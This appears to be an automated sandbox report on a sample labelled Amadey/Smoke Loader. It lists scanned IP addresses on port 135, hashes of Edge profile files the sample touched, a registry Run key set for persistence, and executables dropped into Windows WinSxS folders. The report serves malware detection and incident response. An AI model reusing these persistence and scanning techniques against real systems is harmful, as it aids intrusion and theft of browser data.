| US | 209.76.63.65:135 | tcp | |
| US | 209.76.63.66:135 | tcp | |
| US | 209.76.63.67:135 | tcp | |
| US | 209.76.63.68:135 | tcp | |
| US | 209.76.63.69:135 | tcp | |
| US | 209.76.63.70:135 | tcp | |
| US | 209.76.63.71:135 | tcp | |
| US | 209.76.63.72:135 | tcp | |
| US | 209.76.63.73:135 | tcp | |
| US | 209.76.63.74:135 | tcp | |
| US | 209.76.63.75:135 | tcp | |
| US | 209.76.63.76:135 | tcp | |
| US | 209.76.63.77:135 | tcp | |
| US | 209.76.63.78:135 | tcp | |
| US | 209.76.63.79:135 | tcp | |
| US | 209.76.63.80:135 | tcp | |
| US | 209.76.63.81:135 | tcp | |
| US | 209.76.63.82:135 | tcp | |
| US | 209.76.63.83:135 | tcp | |
| US | 209.76.63.84:135 | tcp | |
| US | 209.76.63.85:135 | tcp | |
| US | 209.76.63.86:135 | tcp | |
| US | 209.76.63.87:135 | tcp | |
| US | 209.76.63.88:135 | tcp | |
| US | 209.76.63.89:135 | tcp | |
| US | 209.76.63.90:135 | tcp | |
| US | 209.76.63.91:135 | tcp | |
| US | 209.76.63.92:135 | tcp | |
| US | 209.76.63.93:135 | tcp | |
| US | 209.76.63.94:135 | tcp | |
| US | 209.76.63.95:135 | tcp | |
| US | 209.76.63.96:135 | tcp | |
| US | 209.76.63.97:135 | tcp | |
| US | 209.76.63.98:135 | tcp | |
| US | 209.76.63.99:135 | tcp | |
| US | 209.76.63.100:135 | tcp | |
| US | 209.76.63.101:135 | tcp | |
| US | 209.76.63.102:135 | tcp | |
| US | 209.76.63.103:135 | tcp | |
| US | 209.76.63.104:135 | tcp | |
| US | 209.76.63.105:135 | tcp | |
| US | 209.76.63.106:135 | tcp | |
| US | 209.76.63.107:135 | tcp | |
| US | 209.76.63.108:135 | tcp | |
| US | 209.76.63.109:135 | tcp | |
| US | 209.76.63.110:135 | tcp | |
| US | 209.76.63.111:135 | tcp | |
| US | 209.76.63.112:135 | tcp |
Files
C:\Program Files\7-Zip\7z.exe-
| MD5 | 8b968ff703f5dd1dabed90c733062abb |
| SHA1 | 442a47894f37dfa6c25d1d29286151854bc32ab3 |
| SHA256 | 0dc88cbf7902f2ea0bd76736cd92d4db110e437f82ac1499fb6daf8d2e33dfa8 |
| SHA512 | 7613882180d8aec28b7a84327426a8d8275c2ec2ed4eae2b398ddb092beb2104908bfeb90ba5d5f806a8904b570eea6334e6444a7ba7cb7741f214cce4c0258e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 1fd686203b0041422c4c3dc14bb1f8f9 |
| SHA1 | a1b1ddd8a57452b4e6e5d51c07bfec323d4b7518 |
| SHA256 | 071f07b8c7ac6d5834476db69516587490b3088ce0fc6dc960c2b085361f3704 |
| SHA512 | 4f102bc3e676052b33240f51e7481491e6f8f2be83436d5681d3548872ea33cfe44aba6f457a1a0be4c33c4864702f768140a1727473d0f1f0d334e4ce16febf |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 30074c8a425af0f3e4b8258a96453ff9 |
| SHA1 | abc5fd8c66d23dc212549d6c82c6d1a5d1da00a4 |
| SHA256 | af57d43f8939868e5c95eee7b533576a1974b3091c6c48adc6f7e637f6700af9 |
| SHA512 | 959b78a99b1b1c3e2f88832ab27434d59c50a0b5a1d5b46b64486c18940ceb63f285a6976d6509f909db75d1e0a559d48b506ec08f825eb460731c3a77cf33d4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 8f818e88f0928c6205988a4e9b78cc8f |
| SHA1 | 67456a2a3b346efa06f5eb94c183c7d8bd141712 |
| SHA256 | 01a589e3d64fb7f76c3c5a223e3e44743bd5e90d0bc781a2ded0ffca0dc37ba8 |
| SHA512 | 48e20516bcda188d11784746f3b6bd44b31f4a2b23baaac009079a345dcd5e45028f85bf6048eb69b1aec2ae3c8ee7c224509dbacc5284b1abee1724196cdf20 |
\??\pipe\crashpad_3192_OVRUJBNNVWUXDOKS
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 322bf661a129017516132be3d26a7c58 |
| SHA1 | 40b498938914eb549ebb4db34529144e04b9c02c |
| SHA256 | 824ff52b9e28e389e749aac3d46c0e0bde93b4681f5750c0448b1af930978f13 |
| SHA512 | ee9695d8a5a3ae033464f872b8260b9f92a0d46764bbc5dcecd5323dcb483371ca69faba071ac912d4e71adbfba78483d099793cf5e6bf107bad7c840e29ba2b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico
| MD5 | 164a788f50529fc93a6077e50675c617 |
| SHA1 | c53f6cd0531fd98d6abbd2a9e5fbb4319b221f48 |
| SHA256 | b305e470fb9f8b69a8cd53b5a8ffb88538c9f6a9c7c2c194a226e8f6c9b53c17 |
| SHA512 | ec7d173b55283f3e59a468a0037921dc4e1bf3fab1c693330b9d8e5826273c917b374c4b802f3234bbb5e5e210d55e52351426867e0eb8c9f6fba1a053cb05d4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\favorites_diagnostic.log
| MD5 | aaa783612cfa5cd2c7b013f90a4cfc52 |
| SHA1 | 9218dcd0b5ff789dedcc771feca78813bca8992f |
| SHA256 | 2a88db51bb51dbc44bf098b75f23725c0fd408bae2f939a35a4eb6070a5ffbaf |
| SHA512 | fb616bb4e5f15c921bfd931b8a3e74e87a9be6e66aea9a30e1f7dbf15133b5d5c13770e4dc41f23de5e390b31cf891165914763ffc48b3b42f7dbb03de3e4e7f |
C:\Users\Admin\AppData\Local\Temp\scoped_dir3192_1714011659\d01e9c01-2f11-495c-9709-3adf1ea705d5.tmp
| MD5 | b384b2c8acf11d0ca778ea05a710bc01 |
| SHA1 | 4d3e01b65ed401b19e9d05e2218eeb01a0a65972 |
| SHA256 | 0a6b11a5b642bf6c1938189707e109a1f48eb02018cfb146f09e74a753567d1b |
| SHA512 | 272dd92a3efbf6cefe4b13127e09a9bd6455f5fc4913e7477c6712e4c3fd67efe87bd0d5bf1ec6b1e65f8d3aa0ac99d5bcf88d8a44d3f3116527253a01dde3be |
C:\Users\Admin\AppData\Local\Temp\e22f4d7d-003e-4f5b-bfe1-8c9a4f346533.tmp
| MD5 | 5058f1af8388633f609cadb75a75dc9d |
| SHA1 | 3a52ce780950d4d969792a2559cd519d7ee8c727 |
| SHA256 | cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8 |
| SHA512 | 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21 |
C:\Users\Admin\AppData\Local\Temp\d4697c4a-e6eb-455e-ae56-cdba40478400.tmp
| MD5 | 78e47dda17341bed7be45dccfd89ac87 |
| SHA1 | 1afde30e46997452d11e4a2adbbf35cce7a1404f |
| SHA256 | 67d161098be68cd24febc0c7b48f515f199dda72f20ae3bbb97fcf2542bb0550 |
| SHA512 | 9574a66d3756540479dc955c4057144283e09cae11ce11ebce801053bb48e536e67dc823b91895a9e3ee8d3cb27c065d5e9030c39a26cbf3f201348385b418a5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\content.js
| MD5 | 3d20584f7f6c8eac79e17cca4207fb79 |
| SHA1 | 3c16dcc27ae52431c8cdd92fbaab0341524d3092 |
| SHA256 | 0d40a5153cb66b5bde64906ca3ae750494098f68ad0b4d091256939eea243643 |
| SHA512 | 315d1b4cc2e70c72d7eb7d51e0f304f6e64ac13ae301fd2e46d585243a6c936b2ad35a0964745d291ae9b317c316a29760b9b9782c88cc6a68599db531f87d59 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
| MD5 | ff5c8f0bf34f771b231dc17b5362cfa8 |
| SHA1 | 771376041aa956204ac27bc36b18dab03e9b6a1b |
| SHA256 | 43d24b686d663a670b6389f0a74972de91e35f680dda4d4f9ca2ff2d096385af |
| SHA512 | ef5b65090476eba3bfc2693674ad9969a3d900f88a75953759272b8edd275c24b9f05e0a153627180075deb31c002f39a7de3e26c157ba1ea81d1a59219887a9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 06ee11483dc66b53fe0311e8991c76e3 |
| SHA1 | 835e6dc6dcd34ebdf67c3bec913c012138ee734d |
| SHA256 | b6a6e9969da25f271168c9baa5c2d3f4b9c2197d6ccd189bf2a85e1a84c594f5 |
| SHA512 | 4252195244138f45fea97dc7eac5f08b40851f661bc9d255cf3513cb8fe5afe8d18223486d8dbec94edfe39c1fbb0e13b3616fb2eba97bd8ec48bd703414109e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 1db3965dee8f40f1da88da2b51040c26 |
| SHA1 | 5b7a6fb4be74c5e4fe01ccc855340bed55767297 |
| SHA256 | 6a8429fddafe3b70efce81669ed7ac696af9e57225e9e1d5a7852bc9e87d5cf5 |
| SHA512 | 00f83289d4fb25adb8622a3367c5989a06b7e51d95be79ded06943dc96644e48d73f5e09719868de255e80556fc052d2fe35ab7e004a25f6f973e29761b971cb |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State
| MD5 | 285252a2f6327d41eab203dc2f402c67 |
| SHA1 | acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6 |
| SHA256 | 5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026 |
| SHA512 | 11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index~RFe57a047.TMP
| MD5 | b5aa057d8300596bb870e65033908aec |
| SHA1 | d6fdaf75a814b48a32c5e4f32e7e147f19302d1a |
| SHA256 | 96d425e42410a372aa4c73f3618385ae7654357a4a6957a6d770e9ab60d8ec98 |
| SHA512 | 6f8c996b9f27233be9eaaa68f92c9e3680bedc3e624800220de690eb2d810f297e07d4498aa2a8feb391fd60c69e0e5c0ca04286bf2d915ad152e8ec6599ac22 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 5fa4374f3591e107912c55dc7aea6aa4 |
| SHA1 | 31e841a7d328d7d0ea9f041d0e1fff9404047c32 |
| SHA256 | ef9c188c9bf8f10bd2dab54949de0d8ec8fbb19fcaa1cb7d97b942f115eebec6 |
| SHA512 | 43cabb600e7dd505c3e6f710798e7db05770f6ced3020c8d5f4bc0e2f6da2b659db5be7ba5adeaa4f48e8f1ae0f6f896305459be2ad8b6fde2abd06c4eab7f72 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\d27a09a4-e9a5-415c-8116-b5c3930f1a1a.tmp
| MD5 | f768bcb451a187c18099961c484eef8b |
| SHA1 | 99472c2d1918ea56c632734bc5c8a89ae6d2551c |
| SHA256 | d988156066b7fd22de278fbc96759d2caea6552094ffeb2ddd9307806059c5e4 |
| SHA512 | a4d78de6bcc1e940c466c41c31ee100235b32fef4cb3e7815a9c62dfae1eb3e4588d2c9e8597152ad7754527643c59ea8b811277ac58e4134a3dbf1507fe97bf |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog
| MD5 | 74f29c737b0d7b13ff96ba6a028972cc |
| SHA1 | 263bb2e80df80af64dccc6865936bba477052fa6 |
| SHA256 | 727e3c4946d07fb05c3ea44c588dd5aa1a478e6e853c0ec8e27bbebe4f2ce13a |
| SHA512 | 795e53bc3db1cbdb17777c3dc57c861f839960a813869303839d79f9e82d5ec6e30a76884e583a1281d165d51468a0172ac3c34d562187944400a1ad328f9f70 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog~RFe583dee.TMP
| MD5 | 2e6eef73d8747bbc35d3dcc946ac66f8 |
| SHA1 | 287d56b05fa42eacc48f2374bfe037abb7709721 |
| SHA256 | 88c22e80c893389a5776dc176d73361cb2956585d4e910f55b9bfd7181758a5d |
| SHA512 | 92ee907c0dc2a163533fa83c25e034743502a3b66728e9d614261518b7548356bf519f38cc9e560d5719af8e16c7106763649517c5f1141c8d41c8e7737acc52 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog
| MD5 | 6dc72e7cc24979f5691d4688727f750f |
| SHA1 | e4573d30cba620be328c9d63be23d8f003a6adcf |
| SHA256 | 5e3a8e39bb672df511ece61cdfe4e3aace7138cfe59c04a60af3ecea318d9222 |
| SHA512 | 3d2c7293df69f7494e7828622739b03e7c77ca78d2666654b647d8e79afc8e30c2332f755769a60eae57f6fad9b17ef1624c14be058682ec795288859bc3a9a3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | db510e0c0bb3ca63b8a0740fe8b2b88c |
| SHA1 | 52b7c31248620ee622cc3e0859e85a2762ee90d5 |
| SHA256 | badb89c4b7aa83a6de559581ad67b40cc8978e3c66bd6adbc8a1a52676d3865c |
| SHA512 | 4612115258a5d666596391e2f9ec8f4d87e2316762aad68786a0ad17aa0098c24259cb1d0a8556e123c511b326e91cbbdf0d2f2e97f23c3e5c447017dc25e2b1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State
| MD5 | 569196f2499251fb5ad4ab0dfbeb1afa |
| SHA1 | a37a88b0ce95fb945b8e4ad583ecc2a78287f331 |
| SHA256 | 0b09409efde4d399fee264e72fd20964758b3a0d5dd84bd2a0e0dfd551bb00ed |
| SHA512 | be459c0baf14ceb0a0277a0bcbf2e0f530473ec3459cbb2f1a0d615e629c4bb57dacfd4e73acc4496b79fd2b7675f0e55495f4fff832a11101bc1ca693873e16 |
C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3192_80005162\manifest.json
| MD5 | af3a9104ca46f35bb5f6123d89c25966 |
| SHA1 | 1ffb1b0aa9f44bdbc57bdf4b98d26d3be0207ee8 |
| SHA256 | 81bd82ac27612a58be30a72dd8956b13f883e32ffb54a58076bd6a42b8afaeea |
| SHA512 | 6a7a543fa2d1ead3574b4897d2fc714bb218c60a04a70a7e92ecfd2ea59d67028f91b6a2094313f606560087336c619093f1d38d66a3c63a1d1d235ca03d36d1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 93e6fff6d343324652b457b0c5b2c5ab |
| SHA1 | 2d56985db3effc63639ecbdee1c3aa77d9f474f2 |
| SHA256 | 6b2dc26007b051003f2eb0ad5c840bd508248a2b51981c022510e4a74da6ed01 |
| SHA512 | 4729221952e32b043bb79e5eb41963f835688a73d9ca24eb93c9a147ea6e0f3220b301e088a9e8a42eff1ad325f06631d1191b2d93cf4d0d92e94da553a78541 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent\1.0.0.9\protocols.json
| MD5 | f9fd82b572ef4ce41a3d1075acc52d22 |
| SHA1 | fdded5eef95391be440cc15f84ded0480c0141e3 |
| SHA256 | 5f21978e992a53ebd9c138cb5391c481def7769e3525c586a8a94f276b3cd8d6 |
| SHA512 | 17084cc74462310a608355fbeafa8b51f295fb5fd067dfc641e752e69b1ee4ffba0e9eafa263aab67daab780b9b6be370dd3b54dd4ba8426ab499e50ff5c7339 |
C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3192_1405593516\manifest.json
| MD5 | 049c307f30407da557545d34db8ced16 |
| SHA1 | f10b86ebfe8d30d0dc36210939ca7fa7a819d494 |
| SHA256 | c36944790c4a1fa2f2acec5f7809a4d6689ecb7fb3b2f19c831c9adb4e17fc54 |
| SHA512 | 14f04e768956bdd9634f6a172104f2b630e2eeada2f73b9a249be2ec707f4a47ff60f2f700005ca95addd838db9438ad560e5136a10ed32df1d304d65f445780 |
C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3192_1665039492\manifest.json
| MD5 | c3911ceb35539db42e5654bdd60ac956 |
| SHA1 | 71be0751e5fc583b119730dbceb2c723f2389f6c |
| SHA256 | 31952875f8bb2e71f49231c95349945ffc0c1dd975f06309a0d138f002cfd23d |
| SHA512 | d8b2c7c5b7105a6f0c4bc9c79c05b1202bc8deb90e60a037fec59429c04fc688a745ee1a0d06a8311466b4d14e2921dfb4476104432178c01df1e99deb48b331 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\WorkspacesNavigationComponent\1.0.0.5\nav_config.json
| MD5 | 499d9e568b96e759959dc69635470211 |
| SHA1 | 2462a315342e0c09fd6c5fbd7f1e7ff6914c17e6 |
| SHA256 | 98252dc9f9e81167e893f2c32f08ee60e9a6c43fadb454400ed3bff3a68fbf0d |
| SHA512 | 3a5922697b5356fd29ccf8dcc2e5e0e8c1fd955046a5bacf11b8ac5b7c147625d31ade6ff17be86e79c2c613104b2d2aebb11557399084d422e304f287d8b905 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 2a6830089e24f3f85ab3239e0f1e2f65 |
| SHA1 | 71263be5508c3762c55418ec6cd88af09dd2eb00 |
| SHA256 | 88507e797f0c05bfbf2fa4b954b28b8b585f5f48f6a8ad4bf8daba416cb3fbfe |
| SHA512 | 274602f813e7213e91a8c4fe742a99fd9dae46c4083a0d65c775e41ff601036e96b47f738ad57f3deee988db3a7f703ca7343ef2e7f7503e983eff0325756b20 |
C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3192_288258558\manifest.json
| MD5 | a24a1941bbb8d90784f5ef76712002f5 |
| SHA1 | 5c2b6323c7ed8913b5d0d65a4d21062c96df24eb |
| SHA256 | 2a7fe18a087d8e8be847d9569420b6e8907917ff6ca0fa42be15d4e3653c8747 |
| SHA512 | fd7dfec3d46b2af0bddb5aaeae79467507e0c29bab814007a39ea61231e76123659f18a453ed3feb25f16652a0c63c33545e2a0d419fafea89f563fca6a07ce2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Data Protection Lists\2.0.0.0\office_endpoints_list.json
| MD5 | 94406cdd51b55c0f006cfea05745effb |
| SHA1 | a15dc50ca0fd54d6f54fbc6e0788f6dcfc876cc9 |
| SHA256 | 8480f3d58faa017896ba8239f3395e3551325d7a6466497a9a69bf182647b25e |
| SHA512 | d4e621f57454fea7049cffc9cc3adfb0d8016360912e6a580f6fe16677e7dd7aa2ee0671cb3c5092a9435708a817f497c3b2cc7aba237d32dbdaae82f10591c3 |
Analysis: behavioral1
Detonation Overview
Submitted
2025-07-04 12:07
Reported
2025-07-04 12:09
Platform
win10v2004-20250619-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
Contacts a large (1018) amount of remote hosts
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ati display driver = "ÔN@" | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
Drops file in System32 directory
Drops file in Program Files directory
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-cleanmgr_31bf3856ad364e35_10.0.19041.1266_none_e20a09e712bd275c\cleanmgr.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-com-complus-setup_31bf3856ad364e35_10.0.19041.1_none_9f98e6cc8eabb4ca\mtstocom.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-embedded-shelllauncher_31bf3856ad364e35_10.0.19041.1202_none_b918e36ffc7a6ffe\eshell.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-wlan-extension_31bf3856ad364e35_10.0.19041.1_none_afd43cb1c2b70f77\wlanext.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\wow64_microsoft-windows-commandprompt_31bf3856ad364e35_10.0.19041.1_none_4b527e92ee1ad1e5\cmd.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\wow64_microsoft-windows-sharedaccess_31bf3856ad364e35_10.0.19041.1_none_c513167c1d0a90dd\icsunattend.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-nfs-admincmdtools_31bf3856ad364e35_10.0.19041.1_none_6a9f2a3a3265ab31\nfsadmin.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.19041.546_none_3f1cc1d15da468cf\logman.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_hyperv-compute-host-service_31bf3856ad364e35_10.0.19041.1288_none_6c70124c60e2b4ef\r\vmcompute.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-utilman_31bf3856ad364e35_10.0.19041.789_none_e07abbe9902a4f60\r\Utilman.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-d..ommandline-adamsync_31bf3856ad364e35_10.0.19041.1081_none_6700b2d2d3c0055f\f\adamsync.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-p..installerandprintui_31bf3856ad364e35_10.0.19041.264_none_b435e08254cda322\f\printui.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-s..sor-native-whitebox_31bf3856ad364e35_10.0.19041.1_none_56e67ce6d0d5a465\RMActivate.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-unattendedjoin_31bf3856ad364e35_10.0.19041.1_none_6905f2230c3224a7\djoin.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-i..raries-servercommon_31bf3856ad364e35_10.0.19041.906_none_87b019d7cebd66d4\f\appcmd.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-networkux-legacyux_31bf3856ad364e35_10.0.19041.1266_none_92496ac84272f5f1\LegacyNetUXHost.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-x..jectdialog.appxmain_31bf3856ad364e35_10.0.19041.423_none_d93ee361fbbc8f0a\f\XGpuEjectDialog.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\wow64_microsoft-windows-getmac_31bf3856ad364e35_10.0.19041.1_none_cc444e9075b95adf\getmac.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\wow64_microsoft-windows-winre-recoverytools_31bf3856ad364e35_10.0.19041.746_none_bd9bc99304595128\ReAgentc.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-browser-brokers_31bf3856ad364e35_11.0.19041.746_none_581ccf386ba57d51\browserexport.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-defrag-adminui_31bf3856ad364e35_10.0.19041.84_none_90b92bf6be625d1b\r\dfrgui.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-ie-iechooser_31bf3856ad364e35_11.0.19041.746_none_122a74c9827fe81a\f\IEChooser.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.19041.1266_none_14b8c34dbc1df417\runexehelper.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\wow64_microsoft-windows-i..raries-servercommon_31bf3856ad364e35_10.0.19041.906_none_9204c42a031e28cf\iissetup.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\wow64_microsoft-windows-newdev_31bf3856ad364e35_10.0.19041.1202_none_908b22903a403149\f\newdev.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-authentication-logonui_31bf3856ad364e35_10.0.19041.1_none_1b8420121296312d\LogonUI.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-bioenrollment.appxmain_31bf3856ad364e35_10.0.19041.844_none_de5d9fe254d9f8c4\BioEnrollmentHost.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\wow64_microsoft-windows-settingsynchost_31bf3856ad364e35_10.0.19041.1202_none_fef803c70cc0b37b\r\SettingSyncHost.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-filehistory-ui_31bf3856ad364e35_10.0.19041.1_none_0423901f2a62a812\FileHistory.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\wow64_microsoft-windows-t..eldebugger-recorder_31bf3856ad364e35_10.0.19041.746_none_4cb1ff2aa122b5dd\r\tttracer.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
